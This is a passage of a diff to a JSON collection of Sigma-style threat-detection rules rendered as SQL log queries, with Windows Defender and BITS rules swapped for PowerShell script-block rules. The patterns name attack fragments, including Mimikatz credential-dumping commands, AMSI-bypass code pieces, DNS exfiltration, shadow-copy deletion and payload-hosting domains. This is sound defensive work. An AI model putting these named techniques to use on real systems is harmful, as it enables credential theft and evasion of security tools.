'%\\\\Windows Defender\\\\Windows Defender Exploit Guard\\\\Controlled Folder Access\\\\ProtectedFolders\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR ScriptBlockText REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR ScriptBlockText REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR ScriptBlockText REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR ScriptBlockText REGEXP '\\*mdr\\*\\W\\s*\\)\\.Name' OR ScriptBlockText REGEXP '\\$VerbosePreference\\.ToString\\('))" ], - "filename": "win_defender_exploit_guard_tamper.yml" + "filename": "posh_ps_invoke_obfuscation_obfuscated_iex.yml" }, { - "title": "LSASS Access Detected via Attack Surface Reduction", - 
"id": "a0a278fe-2c0e-4de2-ac3c-c68b08a9ba98", - "status": "experimental", - "description": "Detects Access to LSASS Process", - "author": "Markus Neis", + "title": "Powershell DNSExfiltration", + "id": "d59d7842-9a21-4bc6-ba98-64bfe0091355", + "status": "test", + "description": "DNSExfiltrator allows for transferring (exfiltrate) a file over a DNS request covert channel", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.exfiltration", + "attack.t1048" ], "falsepositives": [ - "Google Chrome GoogleUpdate.exe", - "Some Taskmgr.exe related activity" + "Legitimate script" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND (EventID = '1121' AND Path LIKE '%\\\\lsass.exe' ESCAPE '\\') AND NOT ((ProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND (ProcessName LIKE '%\\\\thor64.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\thor.exe' ESCAPE '\\')) OR ((ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\atiesrxx.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\CompatTelRunner.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\nvwmi64.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\Taskmgr.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\')) OR ((ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\DriverStore\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\WINDOWS\\\\Installer\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 
'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Invoke-DNSExfiltrator%' ESCAPE '\\' OR (ScriptBlockText LIKE '% -i %' ESCAPE '\\' AND ScriptBlockText LIKE '% -d %' ESCAPE '\\' AND ScriptBlockText LIKE '% -p %' ESCAPE '\\' AND ScriptBlockText LIKE '% -doh %' ESCAPE '\\' AND ScriptBlockText LIKE '% -t %' ESCAPE '\\')))" ], - "filename": "win_defender_alert_lsass_access.yml" + "filename": "posh_ps_invoke_dnsexfiltration.yml" }, { - "title": "PSExec and WMI Process Creations Block", - "id": "97b9ce1e-c5ab-11ea-87d0-0242ac130003", - "status": "test", - "description": "Detects blocking of process creations originating from PSExec and WMI commands", - "author": "Bhabesh Raj", + "title": "Execution via CL_Invocation.ps1 - Powershell", + "id": "4cd29327-685a-460e-9dac-c3ab96e549dc", + "status": "experimental", + "description": "Detects Execution via SyncInvoke in CL_Invocation.ps1 module", + "author": "oscd.community, Natalia Shornikova", "tags": [ - "attack.execution", - "attack.lateral_movement", - "attack.t1047", - "attack.t1569.002" + "attack.defense_evasion", + "attack.t1216" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '1121' AND (ProcessName LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\psexesvc.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%CL\\_Invocation.ps1%' ESCAPE '\\' AND ScriptBlockText LIKE '%SyncInvoke%' ESCAPE '\\')" ], - "filename": "win_defender_psexec_wmi_asr.yml" + "filename": "posh_ps_cl_invocation_lolscript.yml" }, { - "title": "Windows Defender AMSI Trigger Detected", - "id": "ea9bf0fa-edec-4fb8-8b78-b119f2528186", - "status": "stable", - "description": "Detects triggering of AMSI by Windows Defender.", - "author": "Bhabesh Raj", + "title": "Invoke-Obfuscation Via Use 
Clip - Powershell", + "id": "db92dd33-a3ad-49cf-8c2c-608c3e30ace0", + "status": "experimental", + "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ + "attack.defense_evasion", + "attack.t1027", "attack.execution", - "attack.t1059" + "attack.t1059.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '1116' AND SourceName = 'AMSI')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '(?i).*?echo.*clip.*&&.*(Clipboard|i`?n`?v`?o`?k`?e`?).*')" ], - "filename": "win_defender_amsi_trigger.yml" + "filename": "posh_ps_invoke_obfuscation_via_use_clip.yml" }, { - "title": "Microsoft Defender Tamper Protection Trigger", - "id": "49e5bc24-8b86-49f1-b743-535f332c2856", - "status": "stable", - "description": "Detects blocked attempts to change any of Defender's settings such as \"Real Time Monitoring\" and \"Behavior Monitoring\"", - "author": "Bhabesh Raj, Nasreddine Bencherchali", + "title": "Delete Volume Shadow Copies via WMI with PowerShell - PS Script", + "id": "e17121b4-ef2a-4418-8a59-12fb1631fa9e", + "status": "test", + "description": "Deletes Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. 
This technique is used by numerous ransomware families such as Sodinokibi/REvil", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.impact", + "attack.t1490" ], "falsepositives": [ - "Administrator might try to disable defender features during testing (must be investigated)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '5013' AND (Value LIKE '%\\\\Windows Defender\\\\DisableAntiSpyware' ESCAPE '\\' OR Value LIKE '%\\\\Windows Defender\\\\DisableAntiVirus' ESCAPE '\\' OR Value LIKE '%\\\\Windows Defender\\\\Scan\\\\DisableArchiveScanning' ESCAPE '\\' OR Value LIKE '%\\\\Windows Defender\\\\Scan\\\\DisableScanningNetworkFiles' ESCAPE '\\' OR Value LIKE '%\\\\Real-Time Protection\\\\DisableRealtimeMonitoring' ESCAPE '\\' OR Value LIKE '%\\\\Real-Time Protection\\\\DisableBehaviorMonitoring' ESCAPE '\\' OR Value LIKE '%\\\\Real-Time Protection\\\\DisableIOAVProtection' ESCAPE '\\' OR Value LIKE '%\\\\Real-Time Protection\\\\DisableScriptScanning' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-WmiObject%' ESCAPE '\\' AND ScriptBlockText LIKE '%Win32\\_Shadowcopy%' ESCAPE '\\' AND ScriptBlockText LIKE '%.Delete()%' ESCAPE '\\')" ], - "filename": "win_defender_tamper_protection_trigger.yml" + "filename": "posh_ps_susp_win32_shadowcopy.yml" }, { - "title": "Windows Defender Threat Detection Disabled", - "id": "fe34868f-6e0e-4882-81f6-c43aa8f15b62", - "status": "stable", - "description": "Detects disabling Windows Defender threat protection", - "author": "Ján Trenčanský, frack113", + "title": "Powershell Install a DLL in System Directory", + "id": "63bf8794-9917-45bc-88dd-e1b5abc0ecfd", + "status": "experimental", + "description": "Uses PowerShell to install/copy a a file into a system directory such 
as \"System32\" or \"SysWOW64\"", + "author": "frack113, Nasreddine Bencherchali", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.credential_access", + "attack.t1556.002" ], "falsepositives": [ - "Administrator actions (should be investigated)", - "Seen being triggered occasionally during Windows 8 Defender Updates" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID IN ('5001', '5010', '5012', '5101'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Copy-Item %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Destination %' ESCAPE '\\' AND (ScriptBlockText LIKE '%\\\\Windows\\\\System32%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Windows\\\\SysWOW64%' ESCAPE '\\'))" ], - "filename": "win_defender_disabled.yml" + "filename": "posh_ps_copy_item_system_directory.yml" }, { - "title": "Windows Defender Threat Detected", - "id": "57b649ef-ff42-4fb0-8bf6-62da243a1708", - "status": "stable", - "description": "Detects all actions taken by Windows Defender malware detection engines", - "author": "Ján Trenčanský", + "title": "Disable of ETW Trace - Powershell", + "id": "115fdba9-f017-42e6-84cf-d5573bf2ddf8", + "status": "experimental", + "description": "Detects usage of powershell cmdlets to disable or remove ETW trace sessions", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059" + "attack.defense_evasion", + "attack.t1070", + "attack.t1562.006", + "car.2016-04-002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID IN ('1006', '1116', '1015', '1117'))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 
'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Remove-EtwTraceProvider %' ESCAPE '\\' OR (ScriptBlockText LIKE '%Set-EtwTraceProvider %' ESCAPE '\\' AND ScriptBlockText LIKE '%0x11%' ESCAPE '\\')))" ], - "filename": "win_defender_threat.yml" + "filename": "posh_ps_etw_trace_evasion.yml" }, { - "title": "Important Scheduled Task Deleted", - "id": "9e3cb244-bdb8-4632-8c90-6079c8f4f16d", + "title": "Potential Invoke-Mimikatz PowerShell Script", + "id": "189e3b02-82b2-4b90-9662-411eb64486d4", "status": "experimental", - "description": "Detects when adversaries try to stop system services or processes by deleting their respective scheduled tasks in order to conduct data destructive activities", - "author": "frack113", + "description": "Detects Invoke-Mimikatz PowerShell script and alike. Mimikatz is a credential dumper capable of obtaining plaintext Windows account logins and passwords.", + "author": "Tim Rauch", "tags": [ - "attack.impact", - "attack.t1489" + "attack.credential_access", + "attack.t1003" ], "falsepositives": [ - "Unknown" + "Mimikatz can be useful for testing the security of networks" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '141' AND (TaskName LIKE '%\\\\Windows\\\\SystemRestore\\\\SR%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\BitLocker%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\WindowsBackup\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\WindowsUpdate\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\UpdateOrchestrator\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\ExploitGuard%' ESCAPE '\\')) AND NOT ((UserName LIKE '%AUTHORI%' ESCAPE '\\' OR UserName LIKE '%AUTORI%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%DumpCreds%' ESCAPE '\\' AND ScriptBlockText LIKE '%DumpCerts%' ESCAPE '\\') 
OR ScriptBlockText LIKE '%sekurlsa::logonpasswords%' ESCAPE '\\' OR (ScriptBlockText LIKE '%crypto::certificates%' ESCAPE '\\' AND ScriptBlockText LIKE '%CERT\\_SYSTEM\\_STORE\\_LOCAL\\_MACHINE%' ESCAPE '\\')))" ], - "filename": "win_taskscheduler_susp_schtasks_delete.yml" + "filename": "posh_ps_potential_invoke_mimikatz.yml" }, { - "title": "Suspicious Download with BITS from Direct IP", - "id": "90f138c1-f578-4ac3-8c49-eecfd847c8b7", - "status": "experimental", - "description": "Detects a suspicious download using the BITS client from a direct IP. Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Live Memory Dump Using Powershell", + "id": "cd185561-4760-45d6-a63e-a51325112cae", + "status": "test", + "description": "Detects usage of a PowerShell command to dump the live memory of a Windows machine", + "author": "Max Altgelt (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.t1197" + "attack.t1003" ], "falsepositives": [ - "Unknown" + "Diagnostics" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Bits-Client/Operational' AND (EventID = '16403' AND (RemoteName LIKE '%http://1%' ESCAPE '\\' OR RemoteName LIKE '%http://2%' ESCAPE '\\' OR RemoteName LIKE '%http://3%' ESCAPE '\\' OR RemoteName LIKE '%http://4%' ESCAPE '\\' OR RemoteName LIKE '%http://5%' ESCAPE '\\' OR RemoteName LIKE '%http://6%' ESCAPE '\\' OR RemoteName LIKE '%http://7%' ESCAPE '\\' OR RemoteName LIKE '%http://8%' ESCAPE '\\' OR RemoteName LIKE '%http://9%' ESCAPE '\\' OR RemoteName LIKE '%https://1%' ESCAPE '\\' OR RemoteName LIKE '%https://2%' ESCAPE '\\' OR RemoteName LIKE '%https://3%' ESCAPE '\\' OR RemoteName LIKE '%https://4%' ESCAPE '\\' OR RemoteName LIKE '%https://5%' ESCAPE '\\' OR RemoteName LIKE '%https://6%' ESCAPE '\\' OR RemoteName LIKE '%https://7%' ESCAPE '\\' OR RemoteName LIKE 
'%https://8%' ESCAPE '\\' OR RemoteName LIKE '%https://9%' ESCAPE '\\')) AND NOT (((RemoteName LIKE '%://10.%' ESCAPE '\\' OR RemoteName LIKE '%://192.168.%' ESCAPE '\\' OR RemoteName LIKE '%://172.16.%' ESCAPE '\\' OR RemoteName LIKE '%://172.17.%' ESCAPE '\\' OR RemoteName LIKE '%://172.18.%' ESCAPE '\\' OR RemoteName LIKE '%://172.19.%' ESCAPE '\\' OR RemoteName LIKE '%://172.20.%' ESCAPE '\\' OR RemoteName LIKE '%://172.21.%' ESCAPE '\\' OR RemoteName LIKE '%://172.22.%' ESCAPE '\\' OR RemoteName LIKE '%://172.23.%' ESCAPE '\\' OR RemoteName LIKE '%://172.24.%' ESCAPE '\\' OR RemoteName LIKE '%://172.25.%' ESCAPE '\\' OR RemoteName LIKE '%://172.26.%' ESCAPE '\\' OR RemoteName LIKE '%://172.27.%' ESCAPE '\\' OR RemoteName LIKE '%://172.28.%' ESCAPE '\\' OR RemoteName LIKE '%://172.29.%' ESCAPE '\\' OR RemoteName LIKE '%://172.30.%' ESCAPE '\\' OR RemoteName LIKE '%://172.31.%' ESCAPE '\\' OR RemoteName LIKE '%://127.%' ESCAPE '\\' OR RemoteName LIKE '%://169.254.%' ESCAPE '\\')) OR ((RemoteName LIKE '%https://7-%' ESCAPE '\\' OR RemoteName LIKE '%http://7-%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-StorageDiagnosticInfo%' ESCAPE '\\' AND ScriptBlockText LIKE '%-IncludeLiveDump%' ESCAPE '\\')" ], - "filename": "win_bits_client_direct_ip_access.yml" + "filename": "posh_ps_memorydump_getstoragediagnosticinfo.yml" }, { - "title": "Suspicious Download with BITS from Suspicious TLD", - "id": "d635249d-86b5-4dad-a8c7-d7272b788586", - "status": "experimental", - "description": "Detects a suspicious download using the BITS client from a FQDN that is unusual. 
Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.", - "author": "Florian Roth (Nextron Systems)", + "title": "Code Executed Via Office Add-in XLL File", + "id": "36fbec91-fa1b-4d5d-8df1-8d8edcb632ad", + "status": "test", + "description": "Adversaries may abuse Microsoft Office add-ins to obtain persistence on a compromised system.\nOffice add-ins can be used to add functionality to Office programs\n", + "author": "frack113", "tags": [ - "attack.defense_evasion", "attack.persistence", - "attack.t1197" + "attack.t1137.006" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Bits-Client/Operational' AND EventID = '16403' AND (RemoteName LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR RemoteName LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR RemoteName LIKE '%pastebin.com%' ESCAPE '\\' OR RemoteName LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR RemoteName LIKE '%mediafire.com%' ESCAPE '\\' OR RemoteName LIKE '%mega.nz%' ESCAPE '\\' OR RemoteName LIKE '%ddns.net%' ESCAPE '\\' OR RemoteName LIKE '%.paste.ee%' ESCAPE '\\' OR RemoteName LIKE '%.hastebin.com%' ESCAPE '\\' OR RemoteName LIKE '%.ghostbin.co/%' ESCAPE '\\' OR RemoteName LIKE '%ufile.io%' ESCAPE '\\' OR RemoteName LIKE '%storage.googleapis.com%' ESCAPE '\\' OR RemoteName LIKE '%anonfiles.com%' ESCAPE '\\' OR RemoteName LIKE '%send.exploit.in%' ESCAPE '\\' OR RemoteName LIKE '%transfer.sh%' ESCAPE '\\' OR RemoteName LIKE '%privatlab.net%' ESCAPE '\\' OR RemoteName LIKE '%privatlab.com%' ESCAPE '\\' OR RemoteName LIKE '%sendspace.com%' ESCAPE '\\' OR RemoteName LIKE '%pastetext.net%' ESCAPE '\\' OR RemoteName LIKE '%pastebin.pl%' ESCAPE '\\' OR RemoteName LIKE '%paste.ee%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%new-object %' ESCAPE '\\' AND 
ScriptBlockText LIKE '%-ComObject %' ESCAPE '\\' AND ScriptBlockText LIKE '%.application%' ESCAPE '\\' AND ScriptBlockText LIKE '%.RegisterXLL%' ESCAPE '\\')" ], - "filename": "win_bits_client_susp_domain.yml" + "filename": "posh_ps_office_comobject_registerxll.yml" }, { - "title": "Download with BITS to Suspicious Folder", - "id": "f8a56cb7-a363-44ed-a82f-5926bb44cd05", - "status": "experimental", - "description": "Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.\nWindows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001)\n", - "author": "Florian Roth (Nextron Systems)", + "title": "PowerShell ShellCode", + "id": "16b37b70-6fcf-4814-a092-c36bd3aafcbd", + "status": "test", + "description": "Detects Base64 encoded Shellcode", + "author": "David Ledbetter (shellcode), Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.t1197" + "attack.privilege_escalation", + "attack.t1055", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Administrator PowerShell scripts" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Bits-Client/Operational' AND EventID = '16403' AND (LocalName LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR LocalName LIKE '%\\%public\\%%' ESCAPE '\\' OR LocalName LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR LocalName LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%AAAAYInlM%' ESCAPE '\\' AND (ScriptBlockText LIKE '%OiCAAAAYInlM%' ESCAPE '\\' OR ScriptBlockText LIKE '%OiJAAAAYInlM%' ESCAPE '\\'))" ], - "filename": "win_bits_client_susp_local_folder.yml" + "filename": "posh_ps_shellcode_b64.yml" }, { - 
"title": "Unsigned Binary Loaded From Suspicious Location", - "id": "8289bf8c-4aca-4f5a-9db3-dc3d7afe5c10", - "status": "experimental", - "description": "Detects Code Integrity (CI) engine blocking processes from loading unsigned DLLs residing in suspicious locations", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "NTFS Alternate Data Stream", + "id": "8c521530-5169-495d-a199-0a3a881ad24e", + "status": "test", + "description": "Detects writing data into NTFS alternate data streams from powershell. Needs Script Block Logging.", + "author": "Sami Ruohonen", "tags": [ "attack.defense_evasion", - "attack.t1574.002" + "attack.t1564.004", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('11', '12') AND (ImageName LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR ImageName LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR ImageName LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR ImageName LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR ImageName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR ImageName LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%set-content%' ESCAPE '\\' OR ScriptBlockText LIKE '%add-content%' ESCAPE '\\') AND ScriptBlockText LIKE '%-stream%' ESCAPE '\\')" ], - "filename": "win_security_mitigations_unsigned_dll_from_susp_location.yml" + "filename": "posh_ps_ntfs_ads_access.yml" }, { - "title": "Microsoft Defender Blocked from Loading Unsigned DLL", - "id": "0b0ea3cc-99c8-4730-9c53-45deee2a4c86", + "title": "AMSI Bypass Pattern Assembly GetType", + "id": "e0d6c087-2d1c-47fd-8799-3904103c5a98", "status": "experimental", - "description": "Detects Code Integrity (CI) engine blocking Microsoft Defender's processes (MpCmdRun and NisSrv) from loading unsigned DLLs which may be an attempt to 
sideload arbitrary DLL", - "author": "Bhabesh Raj", + "description": "Detects code fragments found in small and obfuscated AMSI bypass PowerShell scripts", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1574.002" + "attack.t1562.001", + "attack.execution" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('11', '12') AND (ProcessPath LIKE '%\\\\MpCmdRun.exe' ESCAPE '\\' OR ProcessPath LIKE '%\\\\NisSrv.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%[Ref].Assembly.GetType%' ESCAPE '\\' AND ScriptBlockText LIKE '%SetValue($null,$true)%' ESCAPE '\\' AND ScriptBlockText LIKE '%NonPublic,Static%' ESCAPE '\\')" ], - "filename": "win_security_mitigations_defender_load_unsigned_dll.yml" + "filename": "posh_ps_amsi_bypass_pattern_nov22.yml" }, { - "title": "HybridConnectionManager Service Running", - "id": "b55d23e5-6821-44ff-8a6e-67218891e49f", - "status": "test", - "description": "Rule to detect the Hybrid Connection Manager service running on an endpoint.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "tags": [ - "attack.persistence", - "attack.t1554" + "title": "Suspicious PowerShell Mailbox Export to Share - PS", + "id": "4a241dea-235b-4a7e-8d76-50d817b146c4", + "status": "experimental", + "description": "Detects usage of the powerShell New-MailboxExportRequest Cmdlet to exports a mailbox to a remote or local share, as used in ProxyShell exploitations", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.exfiltration" ], "falsepositives": [ - "Legitimate use of Hybrid Connection Manager via Azure function apps." 
+ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-ServiceBus-Client' AND EventID IN ('40300', '40301', '40302') AND (logs MATCH ('\"HybridConnection\" OR \"sb://\" OR \"servicebus.windows.net\" OR \"HybridConnectionManage\"')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%New-MailboxExportRequest%' ESCAPE '\\' AND ScriptBlockText LIKE '% -Mailbox %' ESCAPE '\\' AND ScriptBlockText LIKE '% -FilePath \\\\\\\\\\*' ESCAPE '\\')" ], - "filename": "win_hybridconnectionmgr_svc_running.yml" + "filename": "posh_ps_mailboxexport_share.yml" }, { - "title": "Standard User In High Privileged Group", - "id": "7ac407cc-0f48-4328-aede-de1d2e6fef41", + "title": "Invoke-Obfuscation Via Stdin - Powershell", + "id": "86b896ba-ffa1-4fea-83e3-ee28a4c915c7", "status": "experimental", - "description": "Detect standard users login that are part of high privileged groups such as the Administrator group", - "author": "frack113", + "description": "Detects Obfuscated Powershell via Stdin in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.credential_access", - "attack.privilege_escalation" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Standard domain users who are part of the administrator group. These users shouldn't have these right. But in the case where it's necessary. 
They should be filtered out using the \"TargetUserName\" field" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-LSA/Operational' AND (EventID = '300' AND TargetUserSid LIKE 'S-1-5-21-%' ESCAPE '\\' AND (SidList LIKE '%S-1-5-32-544%' ESCAPE '\\' OR SidList LIKE '%-500}%' ESCAPE '\\' OR SidList LIKE '%-518}%' ESCAPE '\\' OR SidList LIKE '%-519}%' ESCAPE '\\')) AND NOT ((TargetUserSid LIKE '%-500' ESCAPE '\\' OR TargetUserSid LIKE '%-518' ESCAPE '\\' OR TargetUserSid LIKE '%-519' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '(?i).*(set).*&&\\s?set.*(environment|invoke|\\$\\{?input).*&&.*\"')" ], - "filename": "win_lsa_server_normal_user_admin.yml" + "filename": "posh_ps_invoke_obfuscation_via_stdin.yml" }, { - "title": "Loading Diagcab Package From Remote Path", - "id": "50cb47b8-2c33-4b23-a2e9-4600657d9746", + "title": "Invoke-Obfuscation Via Use MSHTA - PowerShell", + "id": "e55a5195-4724-480e-a77e-3ebe64bd3759", "status": "experimental", - "description": "Detects loading of diagcab packages from a remote path, as seen in DogWalk vulnerability", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.execution" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate package hosted on a known and authorized remote location" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '101' AND PackagePath LIKE '%\\\\\\\\\\*' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%set%' ESCAPE '\\' AND ScriptBlockText LIKE '%&&%' ESCAPE 
'\\' AND ScriptBlockText LIKE '%mshta%' ESCAPE '\\' AND ScriptBlockText LIKE '%vbscript:createobject%' ESCAPE '\\' AND ScriptBlockText LIKE '%.run%' ESCAPE '\\' AND ScriptBlockText LIKE '%(window.close)%' ESCAPE '\\')" ], - "filename": "win_diagnosis_scripted_load_remote_diagcab.yml" + "filename": "posh_ps_invoke_obfuscation_via_use_mhsta.yml" }, { - "title": "Direct Syscall of NtOpenProcess", - "id": "3f3f3506-1895-401b-9cc3-e86b16e630d0", - "status": "experimental", - "description": "Detects the usage of the direct syscall of NtOpenProcess which might be done from a CobaltStrike BOF.", - "author": "Christian Burkard (Nextron Systems), Tim Shelton", + "title": "Malicious PowerShell Commandlets - ScriptBlock", + "id": "89819aa4-bbd6-46bc-88ec-c7f7fe30efa6", + "status": "test", + "description": "Detects Commandlet names from well-known PowerShell exploitation frameworks", + "author": "Sean Metcalf, Florian Roth, 